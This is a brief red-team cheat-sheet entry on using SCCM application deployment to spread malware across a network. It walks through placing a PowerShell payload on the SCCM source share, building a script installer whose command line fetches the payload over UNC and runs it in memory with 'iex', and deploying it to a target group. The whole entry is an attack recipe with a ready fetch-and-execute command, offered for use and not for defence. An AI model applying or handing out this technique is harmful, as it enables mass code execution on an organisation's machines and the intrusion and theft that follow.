Malware Deployment

Compromise

• Create an application/package that utilizes PowerShell for payload deliery and execution

  • Create a PowerShell payload and throw it up on the public share SCCM uses (i.e. sccmsource)

• Create a Script installer application to fetch and execute your payload :

  • cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""

• Deploy the application to your target group and wait for the SCCM agents to check in

  • Payload is fetched over UNC and runs in memory

Sources